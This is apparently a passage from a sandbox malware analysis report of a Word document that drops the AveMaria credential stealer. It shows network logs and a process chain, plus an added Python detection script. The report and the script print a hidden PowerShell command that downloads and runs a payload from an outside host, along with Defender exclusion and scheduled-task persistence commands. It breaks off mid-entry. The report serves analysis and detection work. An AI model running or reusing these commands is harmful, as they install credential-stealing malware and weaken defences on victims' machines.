                    Sep 23, 2022 08:13:01.934072971 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934108973 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934117079 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934150934 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934171915 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934195995 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934216022 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934235096 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934257030 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934274912 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934293032 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934315920 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934338093 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934357882 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934379101 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934400082 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934417963 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934438944 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934463978 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934478045 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934497118 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Sep 23, 2022 08:13:01.934519053 CEST | 80 | 49171 | 159.223.2.212 | 192.168.2.22
                    Sep 23, 2022 08:13:01.934541941 CEST | 49171 | 80 | 192.168.2.22 | 159.223.2.212
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Sep 23, 2022 08:13:01.747231007 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                    Sep 23, 2022 08:13:01.771946907 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                    Sep 23, 2022 08:13:05.736835957 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                    Sep 23, 2022 08:13:05.760781050 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Sep 23, 2022 08:13:01.747231007 CEST | 192.168.2.22 | 8.8.8.8 | 0xe3a3 | Standard query (0) | login.929389.ankura.us | A (IP address) | IN (0x0001) | false
                    Sep 23, 2022 08:13:05.736835957 CEST | 192.168.2.22 | 8.8.8.8 | 0x447a | Standard query (0) | login.929389.ankura.us | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Sep 23, 2022 08:13:01.771946907 CEST | 8.8.8.8 | 192.168.2.22 | 0xe3a3 | No error (0) | login.929389.ankura.us | | 159.223.2.212 | A (IP address) | IN (0x0001) | false
                    Sep 23, 2022 08:13:05.760781050 CEST | 8.8.8.8 | 192.168.2.22 | 0x447a | No error (0) | login.929389.ankura.us | | 159.223.2.212 | A (IP address) | IN (0x0001) | false
                    • login.929389.ankura.us
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.22 | 49171 | 159.223.2.212 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 23, 2022 08:13:01.840199947 CEST | 0 | OUT | GET /AwOgYiWG/explorer.exe HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: login.929389.ankura.us
                    Connection: Keep-Alive
                    Sep 23, 2022 08:13:01.870949984 CEST | 0 | IN | HTTP/1.1 200 OK
                    Content-Type: application/x-msdownload
                    Date: Fri, 23 Sep 2022 06:13:01 GMT
                    Transfer-Encoding: chunked


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.22 | 49172 | 159.223.2.212 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Timestamp | kBytes transferred | Direction | Data
                    Sep 23, 2022 08:13:08.820766926 CEST | 1038 | OUT | GET /AwOgYiWG/explorer.exe HTTP/1.1
                    Host: login.929389.ankura.us
                    Connection: Keep-Alive
                    Sep 23, 2022 08:13:08.845700026 CEST | 1038 | IN | HTTP/1.1 200 OK
                    Content-Type: application/x-msdownload
                    Date: Fri, 23 Sep 2022 06:13:08 GMT
                    Transfer-Encoding: chunked



                    Target ID:0
                    Start time:08:13:11
                    Start date:23/09/2022
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f2d0000
                    File size:1423704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:4
                    Start time:08:13:17
                    Start date:23/09/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
                    Imagebase:0x13f8e0000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916223647.00000000000BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.916206520.0000000000080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000004.00000002.916438854.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    Reputation:high

                    Target ID:6
                    Start time:08:13:30
                    Start date:23/09/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x4a7a0000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:8
                    Start time:08:13:31
                    Start date:23/09/2022
                    Path:C:\Users\user\AppData\Roaming\explorer.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x1330000
                    File size:974336 bytes
                    MD5 hash:87B246B26208A9831A4372664C518C2C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low

                    Target ID:9
                    Start time:08:13:31
                    Start date:23/09/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
                    Imagebase:0x13ffc0000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937256768.0000000001BA6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000009.00000002.936804353.0000000000350000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.936976360.00000000003D9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    Reputation:high

                    Target ID:11
                    Start time:08:13:37
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
                    Imagebase:0x223f0000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    Target ID:13
                    Start time:08:13:38
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
                    Imagebase:0x880000
                    File size:179712 bytes
                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:15
                    Start time:08:13:41
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:16
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x4a7a0000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
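
The process list above reads as one chain: WINWORD.EXE launching a hidden PowerShell download cradle, cmd.exe starting an explorer.exe copy from AppData\Roaming, a Defender exclusion added with Add-MpPreference, a scheduled task created from a tmp file in Temp, and MSBuild.exe started with no project (the process in which the AveMaria Yara rules match). A process-creation detection should score that chain as a whole rather than one event at a time. The Python below is an added example, not Joe Sandbox code and not the Sigma rules the report cites: it encodes each step as a rule over image path, command line and parent image and counts the distinct techniques seen. EVENTS is constructed from the command lines in the report; the parent images are an assumption made for the example, since the report lists Target IDs rather than parent pids, and the ATT&CK IDs in the labels are this example's own mapping.

```python
"""Score the process-creation chain recorded in this report.
Added example, not Joe Sandbox code. EVENTS is constructed from the command lines
in the process list; the parent images are an assumption made for the example,
since the report lists Target IDs rather than parent pids. The ATT&CK IDs in the
labels are this example's own mapping."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    image: str
    cmdline: str
    parent: str = ""        # parent image path (assumed, see module docstring)

SYSTEM_NAMES = {"explorer.exe", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe"}
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Public)\\", re.I)
CRADLE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I)
STEALTH = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.I)
NO_ARGS = re.compile(r'"?[^"]*\\msbuild\.exe"?\s*$', re.I)   # the image path and nothing else

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rules(ev):
    """Technique labels an event triggers (empty list = nothing notable)."""
    img, cmd, parent = basename(ev.image), ev.cmdline, basename(ev.parent)
    hits = []
    if parent in OFFICE_HOSTS and img in SCRIPT_HOSTS:
        hits.append("T1204.002 Office host spawned a shell/script interpreter")
    if img == "powershell.exe":
        if CRADLE.search(cmd) and STEALTH.search(cmd):
            hits.append("T1059.001 hidden PowerShell download cradle")
        if re.search(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", cmd, re.I):
            hits.append("T1562.001 Defender exclusion added")
    if img == "cmd.exe" and re.search(r"/c\s+\S*\\AppData\\", cmd, re.I):
        hits.append("T1059.003 cmd.exe launches a binary from a user-writable path")
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) \
            and re.search(r'/xml\s+"?[^"]*\\Temp\\', cmd, re.I):
        hits.append("T1053.005 scheduled task created from an XML file in Temp")
    if img == "msbuild.exe" and NO_ARGS.match(cmd.strip()):
        hits.append("T1055 MSBuild.exe started with no project: likely injection host")
    if img in SYSTEM_NAMES and USER_WRITABLE.search(ev.image):
        hits.append("T1036.005 system binary name running from a user-writable path")
    return hits

def analyze(events):
    return [rules(ev) for ev in events]

def chain_score(events):
    """Distinct techniques across the chain; the example treats 4 or more as high confidence."""
    return len({h for hits in analyze(events) for h in hits})

OFFICE = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\explorer.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
EVENTS = [   # constructed from the report's process list; parent links are assumed
    ProcEvent(OFFICE, '"' + OFFICE + '" /Automation -Embedding'),
    ProcEvent(PS64, r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')''', OFFICE),
    ProcEvent(CMD, '"' + CMD + r'" /C C:\Users\user\AppData\Roaming\explorer.exe', OFFICE),
    ProcEvent(DROPPED, DROPPED, CMD),
    ProcEvent(PS32, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe', DROPPED),
    ProcEvent(r"C:\Windows\SysWOW64\schtasks.exe", r'C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp', DROPPED),
    ProcEvent(MSBUILD, MSBUILD, DROPPED),
]
```

analyze(EVENTS) returns one hit list per event (the WINWORD.EXE start itself is clean), and chain_score(EVENTS) counts seven distinct techniques. The MSBuild rule fires only when the command line is the bare image path; a real build invocation carrying a project file does not match, which is the check that keeps this rule quiet on developer machines.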

                    Target ID:17
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.964034718.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000003.964229410.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000000.957645359.000000000054F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

                    Target ID:19
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
                    Imagebase:0x13f260000
                    File size:473600 bytes
                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.962831144.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.961202850.000000000010E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000002.961145654.00000000000D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                    Target ID:20
                    Start time:08:13:42
                    Start date:23/09/2022
                    Path:C:\Users\user\AppData\Roaming\explorer.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x1330000
                    File size:974336 bytes
                    MD5 hash:87B246B26208A9831A4372664C518C2C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                    Target ID:22
                    Start time:08:13:47
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
                    Imagebase:0x223b0000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET

                    Target ID:24
                    Start time:08:13:48
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
                    Imagebase:0xfe0000
                    File size:179712 bytes
                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:26
                    Start time:08:13:52
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:27
                    Start time:08:14:03
                    Start date:23/09/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x4a7a0000
                    File size:345088 bytes
                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:29
                    Start time:08:14:04
                    Start date:23/09/2022
                    Path:C:\Users\user\AppData\Roaming\explorer.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                    Imagebase:0x1330000
                    File size:974336 bytes
                    MD5 hash:87B246B26208A9831A4372664C518C2C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

                    Target ID:30
                    Start time:08:14:08
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
